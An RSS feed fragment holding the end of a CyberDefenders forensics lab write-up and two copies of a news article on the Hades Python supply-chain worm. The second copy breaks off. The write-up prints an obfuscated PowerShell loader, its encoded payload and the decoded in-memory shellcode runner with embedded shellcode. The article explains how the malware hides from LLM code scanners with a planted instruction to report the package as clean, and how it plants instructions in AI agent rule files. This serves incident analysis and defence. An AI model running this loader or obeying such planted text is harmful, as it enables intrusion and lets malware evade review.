(,[System.Convert]::FromBase64String<br>(((''H4sIAMGAvmgCA7VWa4/aOhD9Xqn/''+''IaqQkqhZCA/1LitVuglsgJawsOGxQFHlTQy4m<br>BgSh4d6+9/vOI+F1bLV{0}is1EsKxZ8bjM8dnMo98lxPmS4dH6ef7d1L6dFGA1pKS2x5K1{0}1N<br>yu066mkx54YT6bOkTI{0}Nps''+''7WiPizm5taFATY58l7voG5EYZ4/UgJDhVV+kcaLXGAr+4<br>ef2CXSz+l{0}''+''Pd8g7JHRFOzYw25SyxdGb4n1trMRSKtvLOhhCvyt2+yOr0qzvK{0}2wjRU<br>JGdY8jxOu9RKqvSL1Vs2D9usCLbxA1YyOY8PyJ+uZQf+CGa4w5E22Eb8yXzQhnOcjpNgHkU+PGh<br>RJTERpFh2A2Ya{0}hegMNQ1qSpiD+dzf5Wpunm95HPyRrnWz7HAds4ONgRF4f5Jv''+''I9iu/x<br>fAZeDg+Iv5ipKpjt2AorOT+iVJP+Sxilg/cZdG91Us6dwKrLA1WDir48ps28iOLEUb6QZ0ICFZ6<br>ECIDeLwHgPKMO+nSBOqeJ7JnGKxjyVbosJLHrZ0nXJBu2RpwFR{0}jN9YMIq7MntKUc9{0}pb7a<br>{0}RipkrOJIFTEyHjHizk/uz0ucW1VDYvM7jOp4TH9ePPloTN6OqcqkeeE5xDEc+M+tAeoqcLmC<br>vjileIC4gFrR44X''+''a7JvzJ14wI9XBguFDTELKCcqvPk0mqpsgt{0}8Z''+''rwC55B57m5n<br>BBcGadXopjtrt4ByO5RlEYalI{0}ghvqapKDEcWeJhl+SNIlI+IsHsqndO2IcuKikGfhZupzNNN<br>da8wPeRC5UFRAoO9ss''+''EsQFYBoUpN42Dw6ZJHtLl+Eo4YohYsDkXZQD''+''pgRMDhcUCWA<br>RGNaqHkH89Z6Q/EabGLBsChagDyk1yPmFlpgT76''+''cZ{0}YLEsoLXDJAzrKEYjuUcU0akoCD<br>+giMxfz/SOGl6ohcagFOK''+''6Nkd2tqH''+''rmgfw65Zv1acDRFKMYj4ICFFbC1iUL8qZJIj<br>PKhcEe6''+''Bjzjlk9t78uKFFt7+NnwG9jzj22XLLpcZ2vbrYXdhnVtkP1i715{0}DNf74uGq<br>M6xw57bFa12j2SO6WVm6pt6H8aDFW40WH7eMZn/pUr17uzoUKqFO9s2RiJXE''+''cCuV5oNul<br>MuVu7K+AvTGpLhYGV5nTfaHNox''+''BS+/aZis09Ra9/VK7fxyVrMmINgsVazkfsdD5NK4XCo<br>Wqh+r20TBM5pXt40PxnvWb7tqs+KxQrVVWxq1h1PzboW''+''Wyr2MzMLqFIVps2P4rqdLGoma<br>YlkvwpDewzF7PMo1B48e2Xi0sCtXRA1qao2GJTDYP90t4t/bNnl{0}QKy0PH9h1e0SGOxHL{0}<br>JrW5AEZ7cnRKhSK47CEViYzTADWmmyNxnK8sboU/PuDEjOGtHOy7TXrX91J8a/Q/vwBKjkdEJ+<br>XS7McK/9oCql7/y5HymfFfE{0}EbRSES0Shy''+''CDP2VWz''+''WGClittlRHgoCjTtFQ58<br>TKHRQSvMGGpQylyh9qDM0GcS9RfNaNCKE7o0UqUnQ/XUBLKpm5sJZAicj/mYb2N/wZeafijrOg<br>i4ftArMbvffrAa2xyVJJomegAA8xSdxtEhIJlLivKnwYIuz0FzXoPrNeRg{0}xUoBChWcnEFfi<br>Zj9By9+FBPLHgGHWBWhGNPRXuP+QEBrvAWREX0v/N+mtt9r/5JzqTqs4Q/7/ecOc{0}''+''9Z<br>vVNPNI1Ac2LyecTZ5L9xw4/QoSDnQP6SXHS0S9hkF6Rs8pCUYD+8/QR<br>H7h{0}Eb/qwCdTrOD/AhBI1txXCwAA'')-f''3'')))),<br>[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';<br>$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;<br>$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;<br>$p=[System.Diagnostics.Process]::Start($s);</pre><p>so what’s happening here is:</p><pre>1-  Base64 decode the payload<br>2-  Decompress with GZip<br>3-  Read decoded text into memory<br>4-  Create a ScriptBlock<br>5-  Execute it in memory</pre><p>By following this sequence in reverse, the payload can be decoded by:</p><pre>1- Extract the encoded payload string<br>2- Remove string concatenation markers (''+'' → nothing)<br>3- Replace format placeholders ({0} → 3, as applied by -f '3')<br>4- Base64-decode the result<br>5- GZip-decompress the decoded bytes<br>6- Read the decompressed text<br>7- Recover the original PowerShell code<br>➡️ Encoded string → formatted → decoded → decompressed → readable script</pre><p>so let’s extract the shellcode:</p><pre>H4sIAMGAvmgCA7VWa4/aOhD9Xqn/''+''IaqQkqhZCA/1LitVuglsgJawsOGxQFHlTQy4m<br>BgSh4d6+9/vOI+F1bLV{0}is1EsKxZ8bjM8dnMo98lxPmS4dH6ef7d1L6dFGA1pKS2x5K1{0}1N<br>yu066mkx54YT6bOkTI{0}Nps''+''7WiPizm5taFATY58l7voG5EYZ4/UgJDhVV+kcaLXGAr+4<br>ef2CXSz+l{0}''+''Pd8g7JHRFOzYw25SyxdGb4n1trMRSKtvLOhhCvyt2+yOr0qzvK{0}2wjRU<br>JGdY8jxOu9RKqvSL1Vs2D9usCLbxA1YyOY8PyJ+uZQf+CGa4w5E22Eb8yXzQhnOcjpNgHkU+PGh<br>RJTERpFh2A2Ya{0}hegMNQ1qSpiD+dzf5Wpunm95HPyRrnWz7HAds4ONgRF4f5Jv''+''I9iu/x<br>fAZeDg+Iv5ipKpjt2AorOT+iVJP+Sxilg/cZdG91Us6dwKrLA1WDir48ps28iOLEUb6QZ0ICFZ6<br>ECIDeLwHgPKMO+nSBOqeJ7JnGKxjyVbosJLHrZ0nXJBu2RpwFR{0}jN9YMIq7MntKUc9{0}pb7a<br>{0}RipkrOJIFTEyHjHizk/uz0ucW1VDYvM7jOp4TH9ePPloTN6OqcqkeeE5xDEc+M+tAeoqcLmC<br>vjileIC4gFrR44X''+''a7JvzJ14wI9XBguFDTELKCcqvPk0mqpsgt{0}8Z''+''rwC55B57m5n<br>BBcGadXopjtrt4ByO5RlEYalI{0}ghvqapKDEcWeJhl+SNIlI+IsHsqndO2IcuKikGfhZupzNNN<br>da8wPeRC5UFRAoO9ss''+''EsQFYBoUpN42Dw6ZJHtLl+Eo4YohYsDkXZQD''+''pgRMDhcUCWA<br>RGNaqHkH89Z6Q/EabGLBsChagDyk1yPmFlpgT76''+''cZ{0}YLEsoLXDJAzrKEYjuUcU0akoCD<br>+giMxfz/SOGl6ohcagFOK''+''6Nkd2tqH''+''rmgfw65Zv1acDRFKMYj4ICFFbC1iUL8qZJIj<br>PKhcEe6''+''Bjzjlk9t78uKFFt7+NnwG9jzj22XLLpcZ2vbrYXdhnVtkP1i715{0}DNf74uGq<br>M6xw57bFa12j2SO6WVm6pt6H8aDFW40WH7eMZn/pUr17uzoUKqFO9s2RiJXE''+''cCuV5oNul<br>MuVu7K+AvTGpLhYGV5nTfaHNox''+''BS+/aZis09Ra9/VK7fxyVrMmINgsVazkfsdD5NK4XCo<br>Wqh+r20TBM5pXt40PxnvWb7tqs+KxQrVVWxq1h1PzboW''+''Wyr2MzMLqFIVps2P4rqdLGoma<br>YlkvwpDewzF7PMo1B48e2Xi0sCtXRA1qao2GJTDYP90t4t/bNnl{0}QKy0PH9h1e0SGOxHL{0}<br>JrW5AEZ7cnRKhSK47CEViYzTADWmmyNxnK8sboU/PuDEjOGtHOy7TXrX91J8a/Q/vwBKjkdEJ+<br>XS7McK/9oCql7/y5HymfFfE{0}EbRSES0Shy''+''CDP2VWz''+''WGClittlRHgoCjTtFQ58<br>TKHRQSvMGGpQylyh9qDM0GcS9RfNaNCKE7o0UqUnQ/XUBLKpm5sJZAicj/mYb2N/wZeafijrOg<br>i4ftArMbvffrAa2xyVJJomegAA8xSdxtEhIJlLivKnwYIuz0FzXoPrNeRg{0}xUoBChWcnEFfi<br>Zj9By9+FBPLHgGHWBWhGNPRXuP+QEBrvAWREX0v/N+mtt9r/5JzqTqs4Q/7/ecOc{0}''+''9Z<br>vVNPNI1Ac2LyecTZ5L9xw4/QoSDnQP6SXHS0S9hkF6Rs8pCUYD+8/QR<br>H7h{0}Eb/qwCdTrOD/AhBI1txXCwAA</pre><p>with this amazing cyberchef recipe, we can decode all of it perfectly <a href="https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Extended%20(%5C%5Cn,%20%5C%5Ct,%20%5C%5Cx...)','string':'%5C'%5C'%2B%5C'%5C''%7D,'',true,false,true,false)Find_/_Replace(%7B'option':'Extended%20(%5C%5Cn,%20%5C%5Ct,%20%5C%5Cx...)','string':'%7B0%7D'%7D,'3',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true,false)Gunzip()&amp;input=SDRzSUFNR0F2bWdDQTdWV2E0L2FPaEQ5WHFuLycnKycnSWFxUWtxaFpDQS8xTGl0VnVnbHNnSmF3c09HeFFGSGxUUXk0bQpCZ1NoNGQ2Kzkvdk9JK0YxYkxWezB9aXMxRXNLeFo4YmpNOGRuTW85OGx4UG1TNGRINmVmN2QxTDZkRkdBMXBLUzJ4NUsxezB9MU4KeXUwNjZta3g1NFlUNmJPa1RJezB9TnBzJycrJyc3V2lQaXptNXRhRkFUWTU4bDd2b0c1RVlaNC9VZ0pEaFZWK2tjYUxYR0FyKzQKZWYyQ1hTeitsezB9JycrJydQZDhnN0pIUkZPell3MjVTeXhkR2I0bjF0ck1SU0t0dkxPaGhDdnl0Mit5T3IwcXp2S3swfTJ3alJVCkpHZFk4anhPdTlSS3F2U0wxVnMyRDl1c0NMYnhBMVl5T1k4UHlKK3VaUWYrQ0dhNHc1RTIyRWI4eVh6UWhuT2NqcE5nSGtVK1BHaApSSlRFUnBGaDJBMllhezB9aGVnTU5RMXFTcGlEK2R6ZjVXcHVubTk1SFB5UnJuV3o3SEFkczRPTmdSRjRmNUp2JycrJydJOWl1L3gKZkFaZURnK0l2NWlwS3BqdDJBb3JPVCtpVkpQK1N4aWxnL2NaZEc5MVVzNmR3S3JMQTFXRGlyNDhwczI4aU9MRVViNlFaMElDRlo2CkVDSURlTHdIZ1BLTU8rblNCT3FlSjdKbkdLeGp5VmJvc0pMSHJaMG5YSkJ1MlJwd0ZSezB9ak45WU1JcTdNbnRLVWM5ezB9cGI3YQp7MH1SaXBrck9KSUZURXlIakhpemsvdXowdWNXMVZEWXZNN2pPcDRUSDllUFBsb1RONk9xY3FrZWVFNXhERWMrTSt0QWVvcWNMbUMKdmppbGVJQzRnRnJSNDRYJycrJydhN0p2ekoxNHdJOVhCZ3VGRFRFTEtDY3F2UGswbXFwc2d0ezB9OFonJysnJ3J3QzU1QjU3bTVuCkJCY0dhZFhvcGp0cnQ0QnlPNVJsRVlhbEl7MH1naHZxYXBLREVjV2VKaGwrU05JbEkrSXNIc3FuZE8ySWN1S2lrR2ZoWnVwek5OTgpkYTh3UGVSQzVVRlJBb085c3MnJysnJ0VzUUZZQm9VcE40MkR3NlpKSHRMbCtFbzRZb2hZc0RrWFpRRCcnKycncGdSTURoY1VDV0EKUkdOYXFIa0g4OVo2US9FYWJHTEJzQ2hhZ0R5azF5UG1GbHBnVDc2JycrJydjWnswfVlMRXNvTFhESkF6cktFWWp1VWNVMGFrb0NECitnaU14ZnovU09HbDZvaGNhZ0ZPSycnKycnNk5rZDJ0cUgnJysnJ3JtZ2Z3NjVadjFhY0RSRktNWWo0SUNGRmJDMWlVTDhxWkpJagpQS2hjRWU2JycrJydCanpqbGs5dDc4dUtGRnQ3K05ud0c5anpqMjJYTExwY1oydmJyWVhkaG5WdGtQMWk3MTV7MH1ETmY3NHVHcQpNNnh3NTdiRmExMmoyU082V1ZtNnB0Nkg4YURGVzQwV0g3ZU1abi9wVXIxN3V6b1VLcUZPOXMyUmlKWEUnJysnJ2NDdVY1b051bApNdVZ1N0srQXZUR3BMaFlHVjVuVGZhSE5veCcnKycnQlMrL2FaaXMwOVJhOS9WSzdmeHlWck1tSU5nc1Zhemtmc2RENU5LNFhDbwpXcWgrcjIwVEJNNXBYdDQwUHhudldiN3RxcytLeFFyVlZXeHExaDFQemJvVycnKycnV3lyMk16TUxxRklWcHMyUDRycWRMR29tYQpZbGt2d3BEZXd6RjdQTW8xQjQ4ZTJYaTBzQ3RYUkExcWFvMkdKVERZUDkwdDR0L2JObmx7MH1RS3kwUEg5aDFlMFNHT3hITHswfQpKclc1QUVaN2NuUktoU0s0N0NFVmlZelRBRFdtbXlOeG5LOHNib1UvUHVERWpPR3RIT3k3VFhyWDkxSjhhL1EvdndCS2prZEVKKwpYUzdNY0svOW9DcWw3L3k1SHltZkZmRXswfUViUlNFUzBTaHknJysnJ0NEUDJWV3onJysnJ1dHQ2xpdHRsUkhnb0NqVHRGUTU4ClRLSFJRU3ZNR0dwUXlseWg5cURNMEdjUzlSZk5hTkNLRTdvMFVxVW5RL1hVQkxLcG01c0paQWljai9tWWIyTi93WmVhZmlqck9nCmk0ZnRBck1idmZmckFhMnh5VkpKb21lZ0FBOHhTZHh0RWhJSmxMaXZLbndZSXV6MEZ6WG9Qck5lUmd7MH14VW9CQ2hXY25FRmZpClpqOUJ5OStGQlBMSGdHSFdCV2hHTlBSWHVQK1FFQnJ2QVdSRVgwdi9OK210dDlyLzVKenFUcXM0US83L2VjT2N7MH0nJysnJzlaCnZWTlBOSTFBYzJMeWVjVFo1TDl4dzQvUW9TRG5RUDZTWEhTMFM5aGtGNlJzOHBDVVlEKzgvUVIKSDdoezB9RWIvcXdDZFRyT0QvQWhCSTF0eFhDd0FB&amp;oeol=CRLF"><strong><em>LINK</em></strong></a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4f_YKTIs9k-8Euuwyxeuiw.png"></figure><p>so now, by reading the following decoded script, we can answer easily:</p><pre>function xb {<br>Param ($qx28T, $vN)<br>$csZ = ([AppDomain]::CurrentDomain.GetAssemblies() |<br>Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')<br>[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')<br>return $csZ.GetMethod('GetProcAddress',<br>[Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).<br>Invoke($null, @([System.Runtime.InteropServices.HandleRef]<br>(New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),<br>($csZ.GetMethod('GetModuleHandle')).Invoke($null, @($qx28T)))), $vN)) }<br><br>function a6 {<br>Param (<br>[Parameter(Position = 0, Mandatory = $True)] [Type[]] $tdQq,<br>[Parameter(Position = 1)] [Type] $ig = [Void])<br>$g9s = [AppDomain]::CurrentDomain.DefineDynamicAssembly<br>((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),<br>[System.Reflection.Emit.AssemblyBuilderAccess]::Run).<br>DefineDynamicModule('InMemoryModule', $false).<br>DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,<br>AutoClass', [System.MulticastDelegate])<br>$g9s.DefineConstructor('RTSpecialName,HideBySig,<br>Public', [System.Reflection.CallingConventions]::Standard, $tdQq).<br>SetImplementationFlags('Runtime, Managed') $g9s.DefineMethod('Invoke',<br>'Public, HideBySig, NewSlot, Virtual', $ig, $tdQq).<br>SetImplementationFlags('Runtime, Managed')<br>return $g9s.CreateType() }<br><br>[Byte[]]$acBD8 = [System.Convert]::FromBase64String("/OiPAAAAYInlMd<br>Jki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB<br>0TAHQUItIGItYIAHThcl0PEkx/4s0iwHWMcCswc8NAcc44HX0A334O30kdeBYi1gkAdNm<br>iwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///<br>9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/<br>VagpowKi9lGgCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQM<br>/04Idexo8LWiVv/VagBqBFZXaALZyF// 1Ys2akBoABAAAFZqAGhYpFPl/<br>9WTU2oAVlNXaALZyF//1QHDKcZ17sM=")<br>[Uint32]$o3jH = 0 $i3 = [System.Runtime.InteropServices.Marshal]::<br>GetDelegateForFunctionPointer((xb kernel32.dll VirtualAlloc),<br>(a6 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).<br>Invoke([IntPtr]::Zero, $acBD8.Length,0x3000, 0x04)<br><br>[System.Runtime.InteropServices.Marshal]::<br>Copy($acBD8, 0, $i3, $acBD8.length)<br>if (([System.Runtime.InteropServices.Marshal]::<br>GetDelegateForFunctionPointer ((xb kernel32.dll VirtualProtect),<br>(a6 @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType())<br>([Bool]))).Invoke($i3, [Uint32]<br>$acBD8.Length,0x10,[Ref]$o3jH)) -eq $true) {<br>$v_9 = [System.Runtime.InteropServices.Marshal]::<br>GetDelegateForFunctionPointer((xb kernel32.dll CreateThread),<br>(a6 @([IntPtr] ,[UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])<br>([IntPtr]))). Invoke([IntPtr]::Zero,0,<br>$i3,[IntPtr]::Zero,0,[IntPtr]::Zero)<br>[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer<br>((xb kernel32.dll WaitForSingleObject), (a6 @([IntPtr], [Int32]))).<br>Invoke($v_9,0xffffffff) | Out-Null  }</pre><blockquote><strong><em>acBD8</em></strong></blockquote><blockquote><strong><em>Q16</em></strong><em>: After failing to bypass UAC, the threat actor downloaded another binary to authenticate as the compromised user.<br>What is the original filename of this binary?</em></blockquote><p>According to the question, the attacker downloaded and executed another binary for authentication. Therefore, by filtering Event ID 4624 (successful logon), we can review the associated logon events and identify the processes and files involved during the authentication activity.</p><p>filtered Event ID 4624 and focused on the user hoshisora &lt;victim&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/901/1*gmI3q02mCPRKjVafQMCS4Q.png"></figure><p>found a suspicious binary file, so we need deep investigation for this one:<br><strong>r.exe</strong> file not found in MFT, so i did use NTFS log tracker with and <strong>$MFT </strong><strong>$Logfile </strong><strong>$J </strong>but it was nothing!! so only option we got is Amcache hive:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pr8rhzqpe20Gn5jIpOpXbg.png"></figure><p>after parsing the <strong>Amcache </strong>with Amcacheparser.exe , we got the <strong>sha1 </strong>hash for the <strong>r.exe</strong> file, and using <strong>VirusTotal </strong>we can get the original filename:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Z2Bf7mqqfll1c0yZHXrXdw.png"></figure><blockquote><strong><em>RunasCs.exe</em></strong></blockquote><blockquote><strong><em>Q17</em></strong><em>: What is the SHA-256 hash of the reverse-shell payload the threat actor uploaded and used with the previously identified binary?</em></blockquote><p>Soooo!! answering this question is kinda hard to solve directly without completing all questions, it’s related to <strong>Q19 </strong>&amp;<strong> Q20 </strong>in Persistence section.<br>also, reading the challenge description might help, so anyways let’s dig more<br>by investigating the windows defender logs, we can view that there’s a file caught as a malware by the windows defender, and marked as a trojan/meterpreter reverse-shell</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/706/1*jQqzdJ13A2GkTqooeX802Q.png"></figure><p>So we can get the hash from the <strong>MPLog-*.log </strong>file:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bLxok-RnPkbUZhTPXFIzyA.png"></figure><blockquote><strong><em>087e9494deb843bf6c1f9284697658cb06ac1ac537c1b738ec3bc80f24f32731</em></strong></blockquote><h4>Persistence</h4><blockquote><strong><em>Q18</em></strong><em>: Which MITRE ATT&amp;CK technique did the threat actor use to establish persistence through registry modifications that execute a payload upon a program’s silent termination?</em></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cqPiaapPcZjJVetkuhLjWA.png"></figure><blockquote><strong><em>T1546.012</em></strong></blockquote><blockquote><strong><em>Q19</em></strong><em>: Which program was configured to monitor and execute the threat actor’s payload as part of his persistence mechanism?</em></blockquote><p>The technique used to establish persistence by executing a payload when a process exits silently is: <strong>T1546.012</strong></p><p>This is a sub-technique of Event Triggered Execution (<strong>T1546</strong>) specifically involving Image File Execution Options (IFEO) Injection via the <strong>SilentProcessExit</strong>mechanism.</p><p>The attacker typically modifies the registry key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<br>so let’s investigate it :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/974/1*K6ME9viNoAIQkn0jmj1YvA.png"></figure><blockquote><strong>Notepad</strong></blockquote><blockquote><strong><em>Q20</em></strong><em>: The persistence binary executed once on the compromised system. What was the process ID of this execution?</em></blockquote><p>since we know the persistence binary “<strong>spoolsc.exe</strong>”, getting the process id is easily since we already investigated the windows defender log up and got the process ID there. but let’s get it with another way using <strong>chainsaw</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p4JCxmhG4zw7YuIHwYhzTw.png"></figure><blockquote><strong><em>8056</em></strong></blockquote><h4>Thanks For Reading, Hope you enjoyed❤️</h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=10ddfb745ced" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/lfi-escalation-lab-writeup-cyberdefenders-10ddfb745ced">LFI Escalation Lab Writeup [CyberDefenders]</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meet Hades: The malware that lies to AI security agents]]></title>
<description><![CDATA[Threat actors are continuing their onslaught against software supply chains, now with malware named after death itself.



The newly-discovered Hades Campaign is a “highly sophisticated” supply chain compromise that targets Python developer environments and runs as soon as infected packages are i...]]></description>
<link>https://tsecurity.de/de/3583609/ai-nachrichten/meet-hades-the-malware-that-lies-to-ai-security-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583609/ai-nachrichten/meet-hades-the-malware-that-lies-to-ai-security-agents/</guid>
<pubDate>Tue, 09 Jun 2026 08:03:28 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Threat actors are continuing their onslaught against software supply chains, now with malware named after death itself.</p>



<p>The newly-discovered Hades Campaign is a “highly sophisticated” <a href="https://www.infoworld.com/article/4181836/patching-fast-and-slow-ruby-devs-delay-to-defend-against-supply-chain-attack.html" target="_blank">supply chain compromise</a> that targets Python developer environments and runs as soon as infected packages are imported. It uses the popular Bun toolkit to silently execute multi-layer payloads that can extract sensitive data, move laterally across compromised systems, exploit common security frameworks, and even hijack AI gatekeeper analyzer systems via adversarial prompt injection.</p>



<p>Notably, the campaign exploited the popular C++ library <em>ensmallen</em>, as well as packages in the computational biology, bioinformatics, and genotype-phenotype analysis ecosystems.</p>



<p>The most novel thing about this malware is its combination of advanced tactics, noted <a href="https://www.linkedin.com/in/dbshipley/" target="_blank" rel="noreferrer noopener">David Shipley</a> of Beauceron Security. He noted that we’ve seen memory-focused malware, we’ve seen attacks that attempt to defuse large language model (LLM) powered analysis with hidden prompts, and we’ve seen malware with wiper capabilities.</p>



<p>“But all three, in a fast moving mass propagating worm, is its own kind of nightmare,” he said. “And I suspect this is the way of the future.”</p>



<h2 class="wp-block-heading">How Hades works</h2>



<p>The <a href="https://www.stepsecurity.io/blog/the-hades-campaign-pypi-packages" target="_blank" rel="noreferrer noopener">Hades Campaign</a> was discovered by researchers at StepSecurity, who called it the latest evolution of the Miasma threat actor. The researchers previously described Miasma attacks that had sent self-replicating worms to perform multi-cloud credential sweeps, caused infected repositories to execute code when folders were accessed in integrated development environments (IDEs) or by AI agents, and used techniques that scanned and read Linux process memory.</p>



<p>Hades uses the same credential harvesting methods, self-replicating worm logic, and GitHub-based exfiltration patterns, the researchers noted. In addition to <em>ensmallen</em>, compromised packages include <em>mflux-streamlit</em>, <em>nhmpy</em>, <em>ppkt2synergy</em>, <em>embiggen</em>, <em>gpsea</em>, and <em>pyphetools</em>.</p>



<p>The campaign’s entry point is a simple, obfuscated script embedded inside a Python package’s <em>__init__.py </em>file, a critical building block that gives Python the ability to recognize packages and import modules. Once they gain access, threat actors drop a precompiled Bun runtime binary and executes its JavaScript payload. Bun allows the malware to run complex JavaScript tasks in environments lacking a Node.js installation, bypassing traditional package manager controls and proxy logs.</p>



<p>The malware is able to scrape Linux memory mappings, and also introduces tailored macOS and Windows memory scrapers, which allow threat actors to extract sensitive, encrypted data.</p>



<p>Interestingly, attackers are also able to evade detection by automated LLMs that scan for suspicious code. This is achieved with a simple block of text at the top of the file; this instructs the model to ignore the hidden code below, classify the package as verified and clean, and provide reports stating it is safe.</p>



<p>This element represents what the StepSecurity researchers described as a “significant conceptual shift,” with attackers writing payloads that target AI systems’ cognitive logic. “Scanners that pass raw text to LLMs without strict boundary isolation can be coerced into generating false negative verdicts, allowing the malicious package to bypass organization analysis,” they wrote.</p>



<p>The tactic is indeed clever, Beauceron’s Shipley agreed, pointing out that attackers will increasingly target endpoint LLM-powered agents.</p>



<p>Why? “Because there’s no reliable defense,” he said. “LLMs are incredibly susceptible to social engineering.” This has been relabeled as prompt engineering, but is essentially just phishing for bots, he pointed out.</p>



<p>“While everyone’s worried about LLM-powered vulnerability discovery and automated exploitation, it’s <a href="https://www.csoonline.com/article/4181514/ai-tools-becoming-hot-commodities-on-ransomware-marketplaces.html" target="_blank">LLM-created smart malware</a> like this, and AI-powered phishing of humans and bots, that keeps me awake at night,” Shipley said.</p>



<h2 class="wp-block-heading">Hades’ crafty worm propagation</h2>



<p>The Hades Campaign command and control (C2) infrastructure uses three independent channels on public GitHub infrastructure to allow its communications to blend in with normal traffic. <a href="https://www.csoonline.com/article/4178412/6-critical-security-gaps-every-ciso-must-address.html" target="_blank">Stolen credentials</a> are encrypted locally in a hybrid fashion (serialized, compressed, and pushed to a newly created public GitHub repository under attackers’ control). Exfiltrated repositories carry the description “Hades — The End for the Damned.”</p>



<p>Researchers noted that a core component of this campaign is its ability to propagate and move laterally across networks. It exploits the very methods meant to protect systems, including Secure Shell (SSH) and Secure Copy Protocol (SCP), OpenID Connect (OIDC),and Supply-chain Levels for Software Artifacts (SLSA).</p>



<p>For instance, when running inside a GitHub Actions workflow runner, the malware checks for OIDC variables, then bypasses registry signature policies and generates cryptographically signed SLSA provenance bundles via Sigstore. It can then fetch target libraries and inject the obfuscated script and JavaScript payload. From there, it can publish compromised versions to the Python Package Index (PyPI) repository and node package manager (npm) using the target’s credentials and the generated Sigstore bundle.</p>



<p>“This ensures that the published package appears to have valid, cryptographically verified build provenance from the organization’s official GitHub Actions build environment,” the researchers explained.</p>



<p>Further, if a harvested GitHub token has write permissions, the malware will target repositories to extract secrets using GitHub Actions runners. This occurs “directly from the runner’s address space without ever writing them to disk or making a suspicious network connection,” the researchers noted.</p>



<p>The malware also targets rule files and configuration directories for 14 different AI agents and systems, planting custom prompt instructions or executing hooks that trigger a <em>bun run bootstrap</em> command when the victim loads or consults the workspace with their AI assistant. Finally, it establishes persistence on the workstation and monitors for the presence of the stolen token; if that token is revoked, it executes a wiper process to erase the user’s files.</p>



<p></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meet Hades: The malware that lies to AI security agents]]></title>
<description><![CDATA[Threat actors are continuing their onslaught against software supply chains, now with malware named after death itself.



The newly-discovered Hades Campaign is a “highly sophisticated” supply chain compromise that targets Python developer environments and runs as soon as infected packages are i...]]></description>
<link>https://tsecurity.de/de/3583552/it-security-nachrichten/meet-hades-the-malware-that-lies-to-ai-security-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583552/it-security-nachrichten/meet-hades-the-malware-that-lies-to-ai-security-agents/</guid>
<pubDate>Tue, 09 Jun 2026 07:22:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Threat actors are continuing their onslaught against software supply chains, now with malware named after death itself.</p>



<p>The newly-discovered Hades Campaign is a “highly sophisticated” <a href="https://www.infoworld.com/article/4181836/patching-fast-and-slow-ruby-devs-delay-to-defend-against-supply-chain-attack.html" target="_blank">supply chain compromise</a> that targets Python developer environments and runs as soon as infected packages are imported. It uses the popular Bun toolkit to silently execute multi-layer payloads that can extract sensitive data, move laterally across compromised systems, exploit common security frameworks, and even hijack AI gatekeeper analyzer systems via adversarial prompt injection.</p>



<p>Notably, the campaign exploited the popular C++ library <em>ensmallen</em>, as well as packages in the computational biology, bioinformatics, and genotype-phenotype analysis ecosystems.</p>



<p>The most novel thing about this malware is its combination of advanced tactics, noted <a href="https://www.linkedin.com/in/dbshipley/" target="_blank" rel="noreferrer noopener">David Shipley</a> of Beauceron Security. He noted that we’ve seen memory-focused malware, we’ve seen attacks that attempt to defuse large language model (LLM) powered analysis with hidden prompts, and we’ve seen malware with wiper capabilities.</p>



<p>“But all three, in a fast moving mass propagating worm, is its own kind of nightmare,” he said. “And I suspect this is the way of the future.”</p>



<h2 class="wp-block-heading">How Hades works</h2>



